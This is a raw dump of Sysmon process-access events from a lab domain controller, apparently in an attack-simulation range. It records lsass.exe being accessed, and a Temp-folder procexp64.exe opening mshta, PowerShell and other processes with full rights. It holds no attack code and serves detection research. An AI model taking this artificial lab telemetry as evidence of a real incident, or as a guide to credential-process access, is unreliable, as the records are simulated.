15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.127{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.111{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.111{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.080{732C744F-151A-600B-1600-00000000A301}15281272C:\Windows\system32\svchost.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.064{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.033{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000786482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.033{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.018{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.018{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:05.018{732C744F-1518-600B-0B00-00000000A301}8563440C:\Windows\system32\lsass.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.643{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 